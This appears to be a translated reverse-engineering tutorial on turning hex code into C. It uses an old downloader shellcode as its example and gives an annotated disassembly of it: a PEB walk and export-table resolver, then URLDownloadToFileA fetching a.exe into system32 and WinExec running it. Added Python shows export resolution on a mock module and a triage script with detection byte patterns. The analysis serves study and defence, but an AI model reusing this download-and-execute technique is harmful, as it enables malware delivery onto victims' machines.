There are two kinds of files: text files and program (binary) files. Either kind can be displayed as hexadecimal encoding, which is what is meant by a hex file.
1. A text hex file generally does not need to be converted to C. More often it is a program binary, displayed in hexadecimal, that is converted to C, and this is usually done with a disassembler. There are many tools for this, differing slightly between platforms: on Windows the common ones are OllyDbg, Windbg and IDA; on Linux the most used are GDB and the Linux version of IDA.
OllyDbg, OD for short, is usually the first tool that software reverse-engineering enthusiasts pick up, but since it is no longer updated it is now mostly used for learning. In the figure above, the top-left region is the disassembly pane; from the assembly instructions there the user can work out the program's algorithm and then write the code themselves.
On Windows, and particularly on x64, the most convenient disassembly tool is still Windbg. After loading a program into Windbg, the u command shows the program's disassembly.
2. For programmers, reverse analysis is a basic skill, but it is often hard to get started, so here is an example. Take the hexadecimal code of a ShellCode from some years ago, shown in the figure below. This unremarkable piece of code actually implements a downloader.
Given hexadecimal code like this, the usual approach is to first turn it into a binary file, then analyse its instructions and reconstruct the source from the disassembly. It is enough to save the hexadecimal code above into a C string array, write it into an empty section of an exe file, and patch an instruction at the program entry to jump to it. This process is similar to a packer in the software security field.
Once the hexadecimal code has been written into an exe file, the exe can be loaded into a dynamic debugger for dynamic analysis, or into a static disassembler for static analysis. The difference is that a dynamic debugger actually runs the program, while static disassembly does not, which is why malicious programs are generally analysed statically. The opening part of the disassembly, with comments, is as follows:
4AD75021 5A pop edx ; the return address of the call is saved in edx
4AD75022 64:A1 30000000 mov eax, dword ptr fs:[30] ; fetch the PEB
4AD75028 8B40 0C mov eax, dword ptr [eax+C] ; peb_link (PEB->Ldr)
4AD7502B 8B70 1C mov esi, dword ptr [eax+1C] ; initialization-order module list into esi
4AD7502E AD lods dword ptr [esi] ; [esi]->eax; offset +8 of this entry holds the kernel32.dll address
4AD7502F 8B40 08 mov eax, dword ptr [eax+8] ; eax = address of kernel32.dll
4AD75032 8BD8 mov ebx, eax ; ebx = base address of kernel32.dll
4AD75034 8B73 3C mov esi, dword ptr [ebx+3C] ; esi = offset of the PE header
4AD75037 8B741E 78 mov esi, dword ptr [esi+ebx+78] ; esi = offset of the kernel32.dll export table
4AD7503B 03F3 add esi, ebx ; esi = virtual address of the kernel32.dll export table
4AD7503D 8B7E 20 mov edi, dword ptr [esi+20] ; edi = offset of the ENT
4AD75040 03FB add edi, ebx ; edi = virtual address of the ENT
4AD75042 8B4E 14 mov ecx, dword ptr [esi+14] ; ecx = number of kernel32.dll export addresses
4AD75045 33ED xor ebp, ebp ; ebp = 0
4AD75047 56 push esi ; save the export table virtual address
4AD75048 57 push edi ; save the ENT virtual address
4AD75049 51 push ecx ; save the count
4AD7504A 8B3F mov edi, dword ptr [edi]
4AD7504C 03FB add edi, ebx ; locate the function name in the ENT
4AD7504E 8BF2 mov esi, edx ; esi = the function name to look up, GetProcAddress; the bytes following that call are data
4AD75050 6A 0E push 0E ; 0xe is the number of characters in GetProcAddress
4AD75052 59 pop ecx ; set the loop count to 0xe
4AD75053 F3:A6 repe cmps byte ptr es:[edi], byte ptr [esi] ; while ecx!=0 && zf=1: ecx=ecx-1; cmps compares against GetProcAddress
4AD75055 74 08 je short 4AD7505F ; if the function name in the ENT is GetProcAddress, jump out
4AD75057 59 pop ecx ; not equal: pop the export-address count
4AD75058 5F pop edi ; pop the ENT virtual address
4AD75059 83C7 04 add edi, 4 ; advance edi by 4 bytes, because each ENT element is 4 bytes
4AD7505C 45 inc ebp ; ebp keeps the index at which GetProcAddress is found in the ENT
4AD7505D ^ E2 E9 loopd short 4AD75048 ; loop and search
4AD7505F 59 pop ecx
4AD75060 5F pop edi
4AD75061 5E pop esi
4AD75062 8BCD mov ecx, ebp ; the count is saved in ecx
4AD75064 8B46 24 mov eax, dword ptr [esi+24] ; esi+0x24 = offset of the ordinal table
4AD75067 03C3 add eax, ebx ; virtual address of the ordinal table
4AD75069 D1E1 shl ecx, 1 ; double ecx: ordinals are WORD values, and the ordinal is fetched below via add, so the index must be scaled by 2
4AD7506B 03C1 add eax, ecx
4AD7506D 33C9 xor ecx, ecx ; ecx = 0
4AD7506F 66:8B08 mov cx, word ptr [eax] ; save the ordinal that was read
4AD75072 8B46 1C mov eax, dword ptr [esi+1C] ; eax = offset of the kernel32.dll EAT
4AD75075 > 03C3 add eax, ebx ; eax = virtual address of the kernel32.dll EAT
4AD75077 C1E1 02 shl ecx, 2 ; as above, scale by 4 because EAT elements are DWORD values
4AD7507A 03C1 add eax, ecx
4AD7507C 8B00 mov eax, dword ptr [eax] ; eax = the address of GetProcAddress as a relative virtual address (the RVA stored in the EAT)
4AD7507E 03C3 add eax, ebx ; add the base to obtain the virtual address of GetProcAddress
4AD75080 8BFA mov edi, edx ; the GetProcAddress string into edi
4AD75082 8BF7 mov esi, edi ; esi holds the address of the GetProcAddress string
4AD75084 83C6 0E add esi, 0E ; esi points to the end of the GetProcAddress string
4AD75087 8BD0 mov edx, eax ; edx = address of GetProcAddress
4AD75089 6A 04 push 4
4AD7508B 59 pop ecx ; ecx = 4
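The export-table lookup that the listing performs in assembly (NumberOfFunctions at +0x14, AddressOfFunctions at +0x1C, AddressOfNames at +0x20, AddressOfNameOrdinals at +0x24; a WORD ordinal scaled by 2, then a DWORD RVA scaled by 4), written out as an added Python example. It is not code from the original article: it parses a constructed in-memory module built by build_fake_module, not a real kernel32.dll, and the names and RVAs are made up.

```python
import struct

def u32(img, off):
    return struct.unpack_from("<I", img, off)[0]

def u16(img, off):
    return struct.unpack_from("<H", img, off)[0]

def build_fake_module(names, rvas):
    """Constructed 'mapped module' laid out the way the shellcode expects:
    e_lfanew at 0x3C, export directory RVA at pe+0x78, and an export
    directory whose name table is deliberately in a different order from
    the EAT so that the ordinal indirection is really exercised."""
    img = bytearray(0x400)
    pe, exp, eat, ent, eot, strs = 0x80, 0x100, 0x140, 0x180, 0x1C0, 0x200
    n = len(names)
    struct.pack_into("<I", img, 0x3C, pe)          # e_lfanew
    struct.pack_into("<I", img, pe + 0x78, exp)    # export directory RVA
    struct.pack_into("<I", img, exp + 0x14, n)     # NumberOfFunctions
    struct.pack_into("<I", img, exp + 0x18, n)     # NumberOfNames
    struct.pack_into("<I", img, exp + 0x1C, eat)   # AddressOfFunctions
    struct.pack_into("<I", img, exp + 0x20, ent)   # AddressOfNames
    struct.pack_into("<I", img, exp + 0x24, eot)   # AddressOfNameOrdinals
    for i, name in enumerate(names):
        struct.pack_into("<I", img, ent + 4 * i, strs)        # name RVA
        img[strs:strs + len(name) + 1] = name.encode() + b"\0"
        strs += len(name) + 1
        struct.pack_into("<H", img, eot + 2 * i, n - 1 - i)  # ordinal of name i
        struct.pack_into("<I", img, eat + 4 * (n - 1 - i), rvas[i])
    return bytes(img)

def resolve_export(img, base, wanted):
    """Mirror of the listing: walk the ENT, index the ordinal table with the
    match position, then index the EAT with the ordinal. The listing compares
    only 0xE bytes with repe cmps; here the full zero-terminated name is
    compared, which also rejects names that merely share a prefix."""
    wanted = wanted.encode()
    pe = u32(img, 0x3C)
    exp = u32(img, pe + 0x78)
    count = u32(img, exp + 0x14)      # listing uses +0x14 as the loop count
    ent = u32(img, exp + 0x20)
    for i in range(count):            # ebp plays the role of i
        name_rva = u32(img, ent + 4 * i)
        if img[name_rva:img.index(b"\0", name_rva)] == wanted:
            ordinal = u16(img, u32(img, exp + 0x24) + 2 * i)       # shl ecx,1
            rva = u32(img, u32(img, exp + 0x1C) + 4 * ordinal)      # shl ecx,2
            return base + rva                                        # add eax,ebx
    return None
```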
An experienced programmer can see from this analysis that the main purpose of the disassembly above is to obtain the address of GetProcAddress. Continuing with the disassembly:
4AD7508C E8 50000000 call 4AD750E1 ; set up the IAT: obtain the addresses of 4 functions
4AD75091 83C6 0D add esi, 0D ; the real work of the ShellCode starts here
4AD75094 52 push edx
4AD75095 56 push esi ; urlmon
4AD75096 FF57 FC call dword ptr [edi-4] ; call LoadLibraryA to load urlmon.dll
4AD75099 5A pop edx ; edx = address of GetProcAddress
4AD7509A 8BD8 mov ebx, eax
4AD7509C 6A 01 push 1
4AD7509E 59 pop ecx
4AD7509F E8 3D000000 call 4AD750E1 ; set up the IAT again to obtain URLDownLoadToFileA
4AD750A4 83C6 13 add esi, 13 ; esi points to the end of the URLDownLoadToFileA string
4AD750A7 56 push esi
4AD750A8 46 inc esi
4AD750A9 803E 80 cmp byte ptr [esi], 80 ; test whether [esi] is 0x80; the original bytes contain no 0x80, so anyone reusing this would have to append a byte marking the end of the program
4AD750AC ^ 75 FA jnz short 4AD750A8 ; to get past this jump, patch the data to 0x80 in OD with CTRL+E
4AD750AE 8036 80 xor byte ptr [esi], 80
4AD750B1 5E pop esi
4AD750B2 83EC 20 sub esp, 20 ; reserve 32 bytes of stack space
4AD750B5 > 8BDC mov ebx, esp ; ebx = pointer to the bottom of the stack buffer
4AD750B7 6A 20 push 20
4AD750B9 53 push ebx
4AD750BA FF57 EC call dword ptr [edi-14] ; call GetSystemDirectoryA to get the system directory
4AD750BD C70403 5C612E65 mov dword ptr [ebx+eax], 652E615C ; ebx+0x13: the system path occupies 0x13 bytes
4AD750C4 C74403 04 78650000 mov dword ptr [ebx+eax+4], 6578 ; build the download path %systemroot%\system32\a.exe
4AD750CC 33C0 xor eax, eax
4AD750CE 50 push eax
4AD750CF 50 push eax
4AD750D0 53 push ebx
4AD750D1 56 push esi
4AD750D2 50 push eax
4AD750D3 > FF57 FC call dword ptr [edi-4] ; URLDownLoadToFile downloads the file as a.exe
4AD750D6 8BDC mov ebx, esp
4AD750D8 50 push eax
4AD750D9 53 push ebx
4AD750DA FF57 F0 call dword ptr [edi-10] ; WinExec runs it
4AD750DD 50 push eax
4AD750DE FF57 F4 call dword ptr [edi-C] ; ExitThread exits the thread
The next steps use the already-resolved GetProcAddress() to obtain the addresses of GetSystemDirectory(), URLDownLoadToFile(), WinExec() and ExitProcess() in turn, and call them one after another. At this point an experienced programmer could write out the C code right away. The data that follows is not analysed further; the point here is to show the method.
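The triage a defender does on a hex dump like this, as an added Python example that is not part of the original article: the opcode bytes are transcribed from the listing above (prologue plus the two path-building stores only), the hex is turned into the C string array the text mentions, the bytes are checked for the PEB-walk and export-directory access patterns that identify this kind of resolver, and the ASCII hidden in the imm32 stores is recovered. The marker labels and SAMPLE_HEX are constructed here.

```python
import re

# Constructed sample: bytes transcribed from the listing (not the full shellcode).
SAMPLE_HEX = ("5A 64A1 30000000 8B40 0C 8B70 1C AD 8B40 08 8BD8 8B73 3C 8B741E 78 "
              "03F3 8B7E 20 03FB 8B4E 14 C70403 5C612E65 C74403 04 78650000")

# Byte patterns that betray a 32-bit PEB walk / export-table resolver.
PEB_WALK_MARKERS = {
    "mov eax, fs:[0x30]   (PEB)":              b"\x64\xa1\x30\x00\x00\x00",
    "mov eax, [eax+0xC]   (PEB->Ldr)":         b"\x8b\x40\x0c",
    "mov esi, [eax+0x1C]  (InInitOrder list)": b"\x8b\x70\x1c",
    "mov esi, [ebx+0x3C]  (e_lfanew)":         b"\x8b\x73\x3c",
    "mov esi, [esi+ebx+0x78] (export dir)":    b"\x8b\x74\x1e\x78",
}

def hex_to_bytes(text):
    """Strip whitespace from a hex dump and return the raw bytes."""
    return bytes.fromhex(re.sub(r"\s+", "", text))

def to_c_array(blob, name="shellcode"):
    """Render the bytes as the C char array the text describes saving them in."""
    body = "".join(f"\\x{b:02x}" for b in blob)
    return f'unsigned char {name}[] = "{body}";'

def find_peb_walk(blob):
    """Return the labels of every resolver marker present in the blob."""
    return [label for label, pat in PEB_WALK_MARKERS.items() if pat in blob]

def decode_imm32_strings(blob):
    """Recover ASCII from 'mov dword ptr [ebx+eax(+disp8)], imm32' stores
    (C7 04 03 imm32 and C7 44 03 disp8 imm32), which the listing uses to
    build the file name byte by byte so no plain string appears in the code."""
    found = []
    for m in re.finditer(rb"\xc7(?:\x04\x03|\x44\x03.)(.{4})", blob, re.S):
        found.append(m.group(1).rstrip(b"\0").decode("ascii", "replace"))
    return found

def triage(text):
    blob = hex_to_bytes(text)
    return {"size": len(blob),
            "peb_walk": find_peb_walk(blob),
            "strings": "".join(decode_imm32_strings(blob))}
```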
Even once the rough flow of the hex file is understood, when working in C one usually prefers to handle the assembly instructions directly with the asm keyword and inline assembly, as shown in the figure below:
Through this example you should be able to understand the overall process.